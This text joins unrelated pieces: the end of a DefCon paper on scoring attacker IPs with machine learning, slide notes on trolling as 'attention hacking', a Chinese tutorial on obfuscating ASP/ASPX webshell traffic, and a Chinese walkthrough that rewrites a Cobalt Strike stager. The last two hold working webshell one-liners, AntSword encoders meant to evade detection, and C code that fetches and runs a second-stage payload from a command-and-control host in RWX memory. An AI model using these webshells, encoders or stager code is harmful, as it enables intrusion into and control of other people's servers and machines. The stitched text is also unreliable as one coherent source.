address has been hammering closed ports on these firewalls for the longest time now". Low hanging fruit it seems, but simple and effective triage. Model Intuition This data is routinely used as an OSINT source for blacklisting IP addresses on some SIEM and Monitoring deployments. However, the effectiveness of this measure is debatable at best, because active attackers, and even scripted worms and bots will constantly change IP addresses. However, they will not move very far. There is a tendency of bad behavior being dependent on the topology of the Internet, that is if you have machines that are engaging on a specific type of behavior in the internet, their neighbors (as far as Organizational and ISP Autonomous Systems (AS) are concerned) are more likely to engage in this behavior. This thesis is not only supported by common knowledge, one of the greatest inspirations of this work was a PhD Thesis paper by Moura called "Internet Bad Neighborhoods"[5] and a companion paper called "Internet Bad Neighborhoods Aggregation"[6] that talk about some experiments he and his collaborators have performed using traffic from RNP, the Brazilian academic research network. Same conclusions can be drawn by Google's Recent Safe Browsing Transparency Report [7]. But they will eventually change over time. This information on bad behavior is time-sensitive. If a specific IP address attacked your organization a week ago, this is probably relevant information for the monitoring team if they should commit resources to investigating events Defending Networks with Incomplete Information: A Machine Learning Approach DefCon 21 – 2013 Page 7 from this IP address or nearby IP addresses. If it attacked yesterday, that is certainly more relevant to the team. All Security Monitoring professionals will remember a few occasions when they would be on duty and "recognized" an IP address on the dashboard or event stream and some kind of "intuition" clicked that that was an event they had seen before and it should be followed up. This is the intuition this algorithm intends to capture, using the data gathered from the DShield data to predict if an IP address is likely to be malicious or not. Feature Engineering In order to create the features we need to the machine learning algorithm, we go through the following steps: 1. Initially we cluster the events we have by specific behaviors, such as blocked attempts on port 3389, 22 or 80 or port scans (where the same IP address attempts to connect to multiple ports). These clusters of events are deemed positive for bad behavior in our model, and each of the IP addresses get a rank of one for that day. These clusters from this example were arbitrarily chosen, but could have been selected by an unsupervised learning algorithm. 2. After we have identified these "bad" IP addresses per day, we need to add up their scores. However, we need to attenuate the contribution from each day as the days pass, as described in our time-based intuition component. For that, we apply an exponential function to the ranks of the IP address on each date, so that it will have a specific half-life. a. One of the behaviors we get from this is that if you choose a half-life around 5 to 7 days the contribution from IP addresses that last showed up their contribution will all but disappear in about 90 days or so. This helps the algorithm take in account changes in the Internet topology, or even different threat actors that might be starting to target the organization or getting bored and moving elsewhere. 3. Now that we have ranks for each IP address over time, we group them in sensible ways to exploit the neighborhood behaviors we discussed on the intuition. We compose the IP addresses by arbitrary net blocks (such as /16 or /24) and by which organizational and ISP AS they belong, being careful to normalize the rank by the number of possible IP addresses on the range. The contribution from each IP address must be proportional to the total number of IP addresses we have on the specific grouping. With these calculations, we have all the features we need to train a classifier based on these IP address ranks where we select a group of these features Training the model Given the rank calculations on each IP addresses, we can select a group of IP addresses from the DShield summary events and from contributed blocked logs. We select a few tens of thousands of observations assigning them the label of malicious event. Defending Networks with Incomplete Information: A Machine Learning Approach DefCon 21 – 2013 Page 8 However, in order to properly train the algorithm, we require benign IP addresses as well. Otherwise any algorithm can just infer the trivial case that "everything is malicious". In other to provide sufficient non-malicious IP addresses to train the model, we made use of the lists of Top 1 Million domains provided by Alexa [8] and the Google Safe Browsing [7] initiative. These are not perfect sources and malware domains have been know to creep in, specially when you approach the end of the list. We have found that the initial 20.000 to 40.000 entries hold really well, and provide a good diversity of origin countries. This helps the model not trivialize on specific regions of the world as bad actors given the predominance of US- based log sources on the DShield sampling. With the dataset created with the selected features, it is just a matter of using your favorite classification algorithm. After some experimentation, we have selected Support Vector Machines[9], which do a very good job in separating non-linear groups when the features are numeric (which is our case here). We do not go into the details of the specific math machinery behind this, as it would deviate from the point of this document, but this specific algorithm can be trivially implemented with scientific languages or libraries in Java, Python or R [10]. As in many problems in analytics and machine learning, getting to a good answer is now usually the problem. The machinery is all there, but you need to ask a good question. Results The model was trained using a technique called cross-validation.[11] That basically means that part of the training data of the model is not used to train the model, and is actually used to validate the results from the model trained on the other part of the data (which is then called the validation set). So in machine learning terms, if you do a 10-fold cross-validation, you are effectively dividing your dataset in 10 equally sized subsets, and training your model 10 times, always leaving one of the subsets out of the training. You then predict what the subset classification would be if you did not know it already using this recently trained model. The average of the classification errors you get from each subset (what percentage you got wrong) is called the cross-validation error, which is a good estimation of the model error on new data. [11] For the model described above, using DShield data for the last 6 months, we are able to reach an 85 to 95% of cross-validation accuracy.  The results vary from the way we cluster the "bad behavior" of the data: for instance, it is much more efficient when we are specifically targeting ports 3389 or port 80, but is on the low ends of the results when we target port 22.  There seems to be a high correlation on the amount of observations on the DShield data with this predictive power, as it is very skimpy on port 22, for example, and many days’ worth of data have to be incorporated into the model for it to have enough data points to beat the "dimensionality issue" we described before. However we cannot say for sure if this is case without more data to test the models with. Defending Networks with Incomplete Information: A Machine Learning Approach DefCon 21 – 2013 Page 9 When you generalize a model to completely new data, it is normal that a model loses accuracy, and sometimes it can be a deal breaker. However as we tested the trained models on log data provided by volunteers on the respective days of the trained models, they showed a 80 to 85% of true positive ratings (sensitivity) on items that had previously marked as malicious and 85% to 90% true negative ratings (specificity) [12]. Statistically speaking, that provides an odds likelihood [13]that an event pinpointed by the model in this example has 5.3 to 8.5 times to be malicious than one that did not. That on itself could greatly assist the monitoring team that should be reviewing these logs. Additional details on the accuracy, true positive and true negative ratios for the different experiments will be made available in the presentation itself during the conference. Future Direction and Improvements The main challenges involve the gathering of more historical data to improve the performance of the model further. Additionally, using IP addresses for the correlation makes the detection susceptible to diversionary techniques such as open proxies, Tor and address spoofing (particularly for UDP), making those sources appear malicious as well over time if they are used for malicious purposes. In order to develop this concept further, we have put together a project called MLSec (Machine Learning Security)[14] at http://mlsecproject.org, created to evolve new Machine Learning algorithms focused on assisting Information Security Monitoring. We set up a free service where individuals and organizations submit logs extracted from their SIEMs or firewalls and have access to automated reports from the algorithms to pinpoint points of interest on the network. Their feedback on the detected events also helps us fine-tune the algorithms over time. The service is being scaled out to accept more participants to contribute with log data and feature requests to improve the current models and to develop new ones. Acknowledgments and thanks The author would like to thank: - Sans Technology Institute, and their DShield Project - Team Cymru, for their IP to ASN Mapping project and Bogon Reference - MaxMind for their GeoLite data (http://www.maxmind.com) Defending Networks with Incomplete Information: A Machine Learning Approach DefCon 21 – 2013 Page 10 References [1] "Sci vs. Sci: Attack Vectors for Black-hat Data Scientists, and Possible Countermeasures" - Joseph Turian - http://strataconf.com/strata2013/public/schedule/detail/27213 [2] "Antifragile: Things That Gain from Disorder" - Nassim Nicholas Taleb - http://www.randomhouse.com/book/176227/antifragile-things-that-gain- from-disorder-by-nassim-nicholas-taleb [3] SANS Technology Institute - https://www.sans.org/ [4] DShield API - SANS Internet Storm Center - https://isc.sans.edu/api/ [5] Internet Bad Neighborhoods – G. Moura http://www.utwente.nl/en/archive/2013/03/bad_neighbourhoods_on_the_inte rnet_are_a_real_nuisance.doc/ [6] Internet Bad Neighborhoods Aggregation - http://wwwhome.cs.utwente.nl/~sperottoa/papers/2012/noms2012_badhood s.pdf [7]: https://www.google.com/transparencyreport/safebrowsing/ [8]: http://www.alexa.com/topsites [9]: Support Vector Machines for Classification - Dmitriy Fradkin and Ilya Muchnik - http://paul.rutgers.edu/~dfradkin/papers/svm.pdf [10] R Core Team (2013). R: A language and environment for statistical computing. R Foundation for Statistical Computing, Vienna, Austria. URL http://www.R-project.org/. [11] Cross-validation (statistics) - https://en.wikipedia.org/wiki/Cross- validation_(statistics) [12] Sensitivity and Specificity - http://en.wikipedia.org/wiki/Sensitivity_and_specificity [13] Likelihood ratios in diagnostic testing - http://en.wikipedia.org/wiki/Likelihood_ratios_in_diagnostic_testing [14] MLSec Project - http://mlsecproject.org/
Beyond the Lulz: Black Hat Trolling, White Hat Trolling, and Hacking the Attention Landscape SECTION 1 Are you familiar with fishing? Trolling is where you set your fishing lines in the water and then slowly go back and forth dragging the bait and hoping for a bite. Trolling on the Net is the same concept - someone baits a post and then waits for the bite on the line and then enjoys the ensuing fight. - Anonymous usenet poster, 1995 (relayed by Judith Donath, Identity and Deception in the Virtual Community, 1998) The well-constructed troll is a post that induces lots of newbies and flamers to make themselves look even more clueless than they already do, while subtly conveying to the more savvy and experienced that it is in fact a deliberate troll. If you don't fall for the joke, you get to be in on it. - Troller’s FAQ by trollfaq@altairiv.demon.co.uk, 1996 Being a prick on the internet because you can. Typically unleashing one or more cynical or sarcastic remarks on an innocent by-stander, because it’s the internet and, hey, you can. - EREALLY GUD DEFUNITION MAKUR, Urban Dictionary, 2004 A smart vendor treats vulnerabilities less as a software problem, and more as a PR problem. So if we, the user community, want software vendors to patch vulnerabilities, we need to make the PR problem more acute. - Bruce Schneier, 2007 Laughter at the expense or misfortune of others. - A troll to Gabriella Coleman, Hacker, Hoaxer, Whistleblower, Spy, 2014 Part of: a rich aesthetic tradition of spectacle and transgression... which includes the irreverent legacy of phreakers and the hacker underground. - Gabriella Coleman, Phreaks, Hackers, and Trolls: The Politics of Transgression and Spectacle,’ 2012 The best challenge to the authority of something is to find where its semantic or enforceable borders break down and to exploit those shortcomings. - Brad Troemel, proclaimed the “Troll of Internet Art,” 2012 We’ve come up with the menacing term 'troll' for someone who spreads hate and does other horrible things anonymously on the internet. - Adrian Chen, MIT Technology Review, 2014 Until sensationalist, exploitative media practices are no longer rewarded with page views and ad revenue—in short, until the mainstream is willing to step in front of the funhouse mirror and consider the contours of its own distorted reflection—the most aggressive forms of trolling will always have an outlet, and an audience. - Whitney Phillips, This Is Why We Can’t Have Nice Things, 2015 - Users looking to govern or police their communities - Hackers looking to corral attention or pressure vendors - Subcultural trolls looking for ‘lulz’ - Artists looking to critique cultural practices - Political actors looking to destabilize public sphere - Political actors looking to corral attention or attack opponents • Troll • Bait • Target • Third-party to interpret the exchange • Intended outcome • (Possible amplification) • (Possible political reframing and subsequent amplification) • “Cognitive Hacking”? (Cybenko, et al) • “Attention Hacking”? (boyd) • “Cognitive Denial of Service”? (Waltzman) • Exploiting Socio-Technical “Vulnerabilities”? • A bug or a feature? - Poe’s Law - Context Collapse - Network Anonymity and Ephemerality - Cross Platform Ambiguity - Attention Economics (high cost of verification) - Lack of Trust • Draw attention to ignored issues (agenda setting) • Distract attention from issues • Put pressure on entity (security economics) (accountability) • Draw a telling response (transparency) • Deny a response • Diminish an opponent’s resources or morale • Design ?vulnerabilities? • Intent (public good) vs. Reality (profit) • “Latent affordances” • Trolling is to socio-technical systems what hacking is to technical systems • What lessons are translatable? SECTION 2 WHITE HAT TROLL? • Agenda Setting (from below) • Attention is a scarce resource (attention economics) • Legacy gatekeepers (media) compete with an emergent class of network (social media) gatekeepers to direct attention. • Trolling as social engineering: gaining access (via gatekeepers) to the resources of a closed system (their audience) • Newspaper editors and reporters • Platform designers / vendors • Platform algorithms • Content moderators • Advertisers • Anyone with framing or curating capacity (i.e.: Users) Karine Barzilai-Nahon, 2008 • Exploiting or detourning gatekeeper vulnerabilities to affect readers / users • Eliciting changes to gatekeeping practices • Disclosing dynamics inherent to gatekeeping • Posing as gatekeepers • Capturing legacy gatekeeper resources / audiences • Clickbait / ”Bleeding Leads” / Breaking News • Network curation • Asymmetric cost to debunk • Automated amplification (bots) • Adtech • Context collapse / Poe’s Law / Anonymity • Pepe as a Trojan Horse • Vulnerabilities all the way down? • Where does securitization stop? • What is gatekeeper responsibility to users? • Is this codified? How? • Is paternalistic gatekeeping inherently authoritarian? • Is network gatekeeping inherently democratic? • When is gatekeeping in the public interest? SECTION 3 • Non-prescribed engagement • Push private agenda • Counter to target’s interest • Non-prescribed engagement • Demonstrate attack surface (proof of concept) • Trolling as revelatory moment • Increase pressure on gatekeepers • Troll back • Sense of public interest? • Align system with intent • Disclose vulnerabilities selectively to platforms / journalists • Disable possibility of non-prescribed engagement through research and education • Reduce attack surface • Create a discursive “patch” (i.e. Godwin’s Law) • Who? • What are the incentives? • Who is being tasked to respond? • What is the form of disclosure? • Whose interest is served? • How do ”the lulz” figure in? • What are the ethics of fun at others’ expense? • Has the adoption of trolling as a propaganda technique by states and political radicals changed the possibility of just “doing it for the lulz”? Hacking for fun? SECTION 4 • Political Maneuvering • Chaos / Scorched Earth • Perception Management • Denial of Service • Lulz / Drama • Agenda Setting / Priming • Incitement • Response seeking • Community building • Community governance • Demoralization / Outrage • Profit??? • Source Hacking / Journobaiting • Attentional Honeypots • Keyword Squatting • Capturing the Narrative • Cognitive Denial of Service • Brute Force Harassment • Ironical Bait & Switch • Gaming Databases / Algorithmic Control • Memetic Trojan Horses • Controlled Opposition • Driving a Wedge • Concern Trolling • Brigading / Dogpiling • Sockpuppetry • Jiu Jitsu / Self-Victimization • Doxing • Context Distortion • Deep Fakes / Photoshops SECTION 5 • A bug or a feature? • Is trolling a problem? • Or is this how networked media dynamics are supposed to work? • Do nothing • Incentivize trolling from diverse perspectives • A trolling arms race • A trolling code of ethics • Technical re-design • Policy change • Content moderation • Media literacy (for users and gatekeepers?) • Norms like “Don’t Feed the Trolls” / “Strategic silence” • Regulation • Institutionalized trust and verification • Right to speech ≠ Right to amplification? • Media Literacy vs. Attention Economics? • Network Gatekeeping vs. Paternalism? • What Public Interest? What Ethical system? Which Establishment? • Who discloses, how, to whom, to what end? • Right to free speech with your one mouth? • Right to amplification of that speech? • Monopolization of attention = DOS of other’s free speech? • Finite lifetime problem • Can’t verify/investigate every claim • Inflammatory lies stickier and more profitable • Moderation under counts • No moderation over counts • Do-it-yourself moderation tends to tribalism? • Lessons from Computer Fraud and Abuse Act? • Chilling Effect? • Trolls, Platforms, Journalists? • Negative externalities? • Current laws in place? • To who’s standards? • Addressing what issues? • Informed by red teaming “white hat trolls?” • Informed by external pressure from “gray hat trolls?” • Proof of Concept? • Full disclosure? Security Economics? • Markets? • Selective Disclosure? Security Research? • Bounty Programs? Penetration Testing? Auditing? • Professionalization? • White Hats, Gray Hats, Black Hats? • More Positions, More Issues • Politics of Spectacle • Agonistic Politics • Race to the Bottom? • Norms or Codes of Ethics? All of the above but none too well – cracks are where the light gets through! APPENDIX • Security Economics • Politics of Spectacle / Security Economics • Security Economics • Keyword Squatting • Keyword Squatting • Scorched Earth • Algorithmic Gaming • Critical Trolling • Critical Trolling • Critical Trolling • Counter Meme • Source Hacking • Counter Trolling • Lulz or Retroactive Proof of Concept • Lulz or Proof of Concept • Attention Hacking • Critical Trolling • Cognitive Denial of Service • Ruin Life Campaign • Attention Hacking • Weaponized Irony • Jiu Jitsu • Source Hacking • Attention Hacking • Lulz? • Brute Force Provocation • News Spamming / Counter Framing • Concern Trolling • Concern Trolling • Denial of Service / Harassment • Concern Trolling / Ethnography • Politics of Spectacle • Approved Trolling • Humor as Incidental Troll
ASP/ASPX下的流量混淆 前言 今天谈一谈ASP/ASPX下的流量混淆姿势。 以执行 Response.Write("yzddmr6") 为例。 不带eval的普通编码方式 Unicode(asp/aspx) 利用iis解析unicode的特性,我们可以像sql的bypass一样来用unicode编码绕过。 mr6=Response.Write("yzddmr6") 蚁剑中aspx类型shell默认有unicode编码器,但是asp中没有,可以自己手动添加一份。 大小写(asp) asp对于大小写不敏感,所以可以对payload中的字符进行大小写变换。 mr6=REsponSe.WriTe("yzddmr6") 要注意的是aspx对大小写敏感,改变大小写之后会500。 添加百分号(asp) 熟悉sql注入bypass的同学应该知道,iis+asp允许在每个字符前加一个 % ,此处同理。 mr6=R%e%sp%o%n%se.w%ri%te("yzddmr6") 带eval的普通编码方式 有eval的情况下,无非是找找字符串变换函数来回套娃。 ASCII码(asp/aspx) asp下用chr函数+&连接 aspx下用String.fromCharCode+逗号连接 字符拆分(asp/aspx) asp下用 & 连接字符串,demo同 chr函数 。 aspx用 + 或者 concat 函数连接字符串 mr6=eval('Respons'%2B'e.Write("yzddmr6")',"unsafe") mr6=eval('Respons'.concat('e.Write("yzddmr6")'),"unsafe") mr6=eval(chr(82)%26chr(101)%26chr(115)%26chr(112)%26chr(111)%26chr(110)%26chr(11 5)%26chr(101)%26chr(46)%26chr(87)%26chr(114)%26chr(105)%26chr(116)%26chr(101)%26 chr(40)%26chr(34)%26chr(121)%26chr(122)%26chr(100)%26chr(100)%26chr(109)%26chr(1 14)%26chr(54)%26chr(34)%26chr(41)) mr6=eval(String.fromCharCode(82,101,115,112,111,110,115,101,46,87,114,105,116,10 1,40,34,121,122,100,100,109,114,54,34,41),"unsafe") Base64编码(aspx) Url编码(asp) asp 非常规shell下的编码 以上都是针对于基础类型的shell的流量混淆方法,如果不在最外层再套娃一次的话还是很容易被识别, 这里给出几个demo。 base64_bypass(aspx) shell 可以按照https://yzddmr6.tk/posts/webshell-venom-aspx/ 这篇文章做一下免杀 base64_bypass编码器 mr6=eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase 64String("UmVzcG9uc2UuV3JpdGUoInl6ZGRtcjYiKTs=")),"unsafe"); eval(unescape("%25%35%32%25%36%35%25%37%33%25%37%30%25%36%66%25%36%65%25%37%33%2 5%36%35%25%32%65%25%35%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%32%32% 25%37%39%25%37%61%25%36%34%25%36%34%25%36%64%25%37%32%25%33%36%25%32%32%25%32%39 ")) <%@ Page Language="Jscript"%> <%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64 String(Request.Item["mr6"])),"unsafe");%> // // aspx::base64_bypass 编码模块 // 把所有参数都进行base64编码 // author:yzddmr6 'use strict'; module.exports = (pwd, data, ext = null) => { let randomID; if (ext.opts.otherConf['use-random-variable'] === 1) {   randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']); } else {   randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`; } data[randomID] = Buffer   .from(data['_'])   .toString('base64'); data[pwd] = Buffer.from(`eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert .FromBase64String(Request.Item["${randomID}"])),"unsafe");`).toString('base64'); delete data['_']; url_bypass(asp) shell url_bypass编码器 return data; } <%execute(unescape(request("mr6")))%> /** * asp::url_bypass 编码器 * 双重url编码 * author: yzddmr6 * <%execute(unescape(request("mr6")))%> */ 'use strict'; module.exports = (pwd, data) => {   function str2url(str) {       var ret = "";       for (var i = 0; i < str.length; i++) {         ret += "%"+str[i].charCodeAt().toString(16);       }       return ret;     }   data[pwd] = `asunescape(${str2url(str2url(data['_']))})`;   delete data['_'];   return data; } 最后 个人推荐的做法还是类似随机cookie编码器那种一次一密的做法,不过可能asp/aspx实现起来不像php 那么方便,有空了研究一下。 上面所提到的编码方式可以相互套娃,效果可能更佳。 如果其他想法后面再补上,此贴长期更新。
CS的shellcode功能分析和代码重写实战 前⾔ 随着圈⼦⾥的新⼈越来越多,我准备从这⼀篇开始慢慢写⼀些与基础知识相关的⽂章,⽅便 ⼀些对⼆进制安全知识了解不多的同学参考。虽然讲的还是基础知识,但是我也尽量写的实 ⽤和有趣⼀点,防⽌与⽹上的⽂章出现同质化问题。 这篇要讲的问题是由上⼀篇⽂章 滥⽤具备RWX-S权限且有签名的dll进⾏⽆感知的shellcode 注⼊引出的,有同学问我为什么接收 metepreter 第⼆阶段的恶意代码需要那样写,本篇⽂ 章就回答这个问题。 另外⾮常欢迎各位同学在圈⼦⾥提问,能为基础知识板块的编写提供更多素材 CS的shellcode功能分析 我们这⾥讲的其实是stage类型的shellcode,为了⽅便调试从cs中获取出这⼀段代码,我们 需要把它编译成exe,由于我是 *nix 系统,这⾥就⽤ nasm 进⾏编译,⽤ x86_64-w64-min gw32-ld 进⾏链接⽣成exe。 编写 start.asm 如下: 然后编译连接: 测试⼀下可以上线,接下来⽤ida打开分析⼀下执⾏逻辑 开头就是⼀个 call ,跟进去简单看⼀下代码逻辑: nasm -f win64 start.asm -o prog1.o x86_64-w64-mingw32-ld prog1.o -o prog1.exe 1 2 看到pop了 rbp ,然后 call rbp ,显然这个函数的作⽤是把 call 的下⼀条指令作为函数 进⾏调⽤,我们定义⼀下这个函数,然后仔细阅读⼀下,我对所有的代码都打了注释,这个 函数包含了核⼼代码。 .text:000000014000100A call_function_with_hash proc near .text:000000014000100A .text:000000014000100A var_38          = qword ptr -38h .text:000000014000100A .text:000000014000100A                 push    r9 .text:000000014000100C                 push    r8 .text:000000014000100E                 push    rdx .text:000000014000100F                 push    rcx .text:0000000140001010                 push    rsi .text:0000000140001011                 xor     rdx, rdx .text:0000000140001014                 mov     rdx, gs: [rdx+60h] ; 获取 PEB .text:0000000140001019                 mov     rdx, [rdx+18h]  ; 获取 Ldr .text:000000014000101D                 mov     rdx, [rdx+20h]  ; 获取 InMemoryOrderModuleList .text:0000000140001021 .text:0000000140001021 loc_140001021:                          ; CODE XREF: call_function_with_hash+C3↓j 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 .text:0000000140001021                 mov     rsi, [rdx+50h]  ; 获取第⼀个dll的BaseDllName .text:0000000140001025                 movzx   rcx, word ptr [rdx+4Ah] ; 获取 BaseDllName unicode_string 的 max_length .text:000000014000102A                 xor     r9, r9 .text:000000014000102D .text:000000014000102D loc_14000102D:                          ; CODE XREF: call_function_with_hash+34↓j .text:000000014000102D                 xor     rax, rax .text:0000000140001030                 lodsb .text:0000000140001031                 cmp     al, 61h ; 'a' .text:0000000140001033                 jl     short loc_140001037 .text:0000000140001035                 sub     al, 20h ; ' ' .text:0000000140001037 .text:0000000140001037 loc_140001037:                          ; CODE XREF: call_function_with_hash+29↑j .text:0000000140001037                 ror     r9d, 0Dh .text:000000014000103B                 add     r9d, eax .text:000000014000103E                 loop   loc_14000102D   ; 计算 hash .text:0000000140001040                 push    rdx .text:0000000140001041                 push    r9 .text:0000000140001043                 mov     rdx, [rdx+20h]  ; 获取Dllbase .text:0000000140001047                 mov     eax, [rdx+3Ch]  ; 获取 Pe 的 nt_header .text:000000014000104A                 add     rax, rdx .text:000000014000104D                 cmp     word ptr [rax+18h], 20Bh ; ⽐较是不是 pe64 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 .text:0000000140001053                 jnz     short loc_1400010C7 .text:0000000140001055                 mov     eax, [rax+88h]  ; 获取导出表 .text:000000014000105B                 test    rax, rax .text:000000014000105E                 jz     short loc_1400010C7 .text:0000000140001060                 add     rax, rdx        ; 获取导出表的地址 .text:0000000140001063                 push    rax .text:0000000140001064                 mov     ecx, [rax+18h]  ; NumberOfNames .text:0000000140001067                 mov     r8d, [rax+20h]  ; AddressOfNames .text:000000014000106B                 add     r8, rdx .text:000000014000106E .text:000000014000106E loc_14000106E:                          ; CODE XREF: call_function_with_hash+8A↓j .text:000000014000106E                 jrcxz   loc_1400010C6 .text:0000000140001070                 dec     rcx .text:0000000140001073                 mov     esi, [r8+rcx*4] ; 存储函数名称地址 .text:0000000140001077                 add     rsi, rdx .text:000000014000107A                 xor     r9, r9 .text:000000014000107D .text:000000014000107D loc_14000107D:                          ; CODE XREF: call_function_with_hash+80↓j .text:000000014000107D                 xor     rax, rax .text:0000000140001080                 lodsb .text:0000000140001081                 ror     r9d, 0Dh .text:0000000140001085                 add     r9d, eax .text:0000000140001088                 cmp     al, ah 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 .text:000000014000108A                 jnz     short loc_14000107D .text:000000014000108C                 add     r9, [rsp+40h+var_38] .text:0000000140001091                 cmp     r9d, r10d .text:0000000140001094                 jnz     short loc_14000106E ; 遍历导出表 .text:0000000140001096                 pop     rax .text:0000000140001097                 mov     r8d, [rax+24h] .text:000000014000109B                 add     r8, rdx .text:000000014000109E                 mov     cx, [r8+rcx*2] .text:00000001400010A3                 mov     r8d, [rax+1Ch] .text:00000001400010A7                 add     r8, rdx .text:00000001400010AA                 mov     eax, [r8+rcx*4] .text:00000001400010AE                 add     rax, rdx        ; 存储获取的函数地址 .text:00000001400010B1                 pop     r8 .text:00000001400010B3                 pop     r8 .text:00000001400010B5                 pop     rsi .text:00000001400010B6                 pop     rcx .text:00000001400010B7                 pop     rdx .text:00000001400010B8                 pop     r8 .text:00000001400010BA                 pop     r9 .text:00000001400010BC                 pop     r10 .text:00000001400010BE                 sub     rsp, 20h .text:00000001400010C2                 push    r10 .text:00000001400010C4                 jmp     rax 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 主要功能就是遍历当前的模块的导出表,根据提供的函数hash找到对应函数,然后jmp过 去。Hash函数的python实现⼤概如下: .text:00000001400010C6 ; ------------------------------ --------------------------------------------- .text:00000001400010C6 .text:00000001400010C6 loc_1400010C6:                          ; CODE XREF: call_function_with_hash:loc_14000106E↑j .text:00000001400010C6                 pop     rax .text:00000001400010C7 .text:00000001400010C7 loc_1400010C7:                          ; CODE XREF: call_function_with_hash+49↑j .text:00000001400010C7                                         ; call_function_with_hash+54↑j .text:00000001400010C7                 pop     r9 .text:00000001400010C9                 pop     rdx .text:00000001400010CA                 mov     rdx, [rdx] .text:00000001400010CD                 jmp     loc_140001021   ; 获取第⼀个dll的BaseDllName .text:00000001400010CD call_function_with_hash endp 83 84 85 86 87 88 89 90 91 92 93 94 def ror(number,bits):    return ( (number >> bits) | (number << ( 32 - bits )) ) & 0xFFFFFFFF def calc_sum(data,cast=False):    sum = 0    for i in data:        c = 0        if cast:            c = i - 0x20 if i >= ord('a') else i        else: 1 2 3 4 5 6 7 8 9 10 我们不再这⾥浪费太多篇幅,直接在这个函数的 jmp rax 上下断点,使⽤x64dbg进⾏调试, 把调⽤过的函数都记录下来,结果如下:            c = i        sum = ror( sum,0xd)        sum += c    return sum def Hash(dllname,funcname):    dllname += '\x00'    dllname = dllname.encode('utf-16le')    funcname += '\x00'    funcname = funcname.encode('utf-8')    return (calc_sum(dllname,True)+calc_sum(funcname) ) & 0xFFFFFFFF c = Hash('kernel32.dll','LoadLibraryA') print(hex(c)) 11 12 13 14 15 16 17 18 19 20 21 22 23 24 之后就是jmp到 VirtualAlloc 的出来的这段地址上运⾏了。 可以看到这段代码的运⾏效率其实是⽐较低的,每调⽤⼀次函数就会遍历⼀遍当前所有模块 的所有导出函数,但是为了减少shellcode的体积,这么做也是值的的。 下⾯就开始进⼊了本⽂的重点内容,对上⾯这⼀段代码进⾏重写。如果我们还是按照上⾯的 思路编写shellcode,那其实毫⽆意义,因为随便找个shellcode框架就可以⽣成了,我们接 下来换⼀种实现思路。 代码实现 ⾸先我们知道,在⼀个windows系统开机之后,所有进程加载的 ntdll.dll , kernel32.dl l , user32.dll 的基址是相同的,这是由于windows内部的某些特定机制决定的,这⾥就不 再展开细讲了。基于这个原理,⼀些函数的固定的函数地址完全可以在当前进程中获取,然 后作为参数传给shellcode执⾏,废话不多说,直接看代码。 ⾸先定义要传⼊shellcode函数的数据结构,并对这个结构进⾏赋值: kernel32.LoadLibraryA("wininet") rax = wininet.InternetOpenA(NULL,NULL,NULL,NULL,NULL) wininet.InternetConnectA(rax,ip,port,NULL,NULL,0x3,0,0) wininet.HttpOpenRequestA(rax,NULL,"/4v9z",NULL,NULL,NULL ,0x84400200,NULL) wininet.HttpSendRequestA(rax,"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)\r\n",-1,NULL,0); kernel32.VirtualAlloc(0,0x400000,0x1000,0x40 ) wininet.InternetReadFile(rcx,rdx,0x2000,rsp) 1 2 3 4 5 6 7 typedef struct _SHELLDATA { pVirtualAlloc fnVirtualAlloc; 1 2 3 pLoadLibraryA fnLoadLibraryA; pGetProcAddress fnGetProcAddress; char wininet[15]; char InternetOpenA[15]; char InternetConnectA[18]; char HttpOpenRequestA[18]; char HttpSendRequestA[18]; char InternetReadFile[18]; INTERNET_PORT port; char ip[15]; char path[10]; char ua[80]; }SHELLDATA, * PSHELLDATA; // 对数据进⾏赋值 HMODULE  kernel32 = GetModuleHandleA("kernel32"); FARPROC  fnVirtualAlloc = GetProcAddress(kernel32,"VirtualAlloc"); FARPROC  fnLoadLibraryA = GetProcAddress(kernel32,"LoadLibraryA"); FARPROC  fnGetProcAddress = GetProcAddress(kernel32,"GetProcAddress"); SHELLDATA shelldata = { (pVirtualAlloc)fnVirtualAlloc, (pLoadLibraryA)fnLoadLibraryA, (pGetProcAddress)fnGetProcAddress, "wininet", "InternetOpenA", 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 接下来定义作为shellcode执⾏的函数: "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA", "InternetReadFile", 80, "", "/4v9z", "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)\r\n" }; 34 35 36 37 38 39 40 41 42 void shellcode(SHELLDATA * pfunc_start) { HMODULE wininet = pfunc_start- >fnLoadLibraryA(pfunc_start->wininet); pInternetOpenA fnInternetOpenA = (pInternetOpenA)pfunc_start->fnGetProcAddress(wininet, pfunc_start->InternetOpenA); pInternetConnectA fnInternetConnectA = (pInternetConnectA)pfunc_start- >fnGetProcAddress(wininet, pfunc_start- >InternetConnectA); pHttpOpenRequestA fnHttpOpenRequestA = (pHttpOpenRequestA)pfunc_start- >fnGetProcAddress(wininet, pfunc_start- >HttpOpenRequestA); pHttpSendRequestA fnHttpSendRequestA = (pHttpSendRequestA)pfunc_start- >fnGetProcAddress(wininet, pfunc_start- >HttpSendRequestA); 1 2 3 4 5 6 7 pInternetReadFile fnInternetReadFile = (pInternetReadFile)pfunc_start- >fnGetProcAddress(wininet, pfunc_start- >InternetReadFile); HINTERNET hin = fnInternetOpenA(NULL, NULL, NULL, NULL, NULL); HINTERNET session = fnInternetConnectA(hin, pfunc_start->ip, pfunc_start->port, NULL, NULL, 0x3, 0, 0); HINTERNET req = fnHttpOpenRequestA(session, NULL, pfunc_start->path, NULL, NULL, NULL, 0x84400200, NULL); while (TRUE) { BOOL status = fnHttpSendRequestA(req, pfunc_start- >ua, -1, NULL, 0); if (status) break; SleepEx(1000,FALSE); } LPVOID addr =  pfunc_start->fnVirtualAlloc(0, 0x400000, 0x1000, 0x40); DWORD size = 0; LPVOID 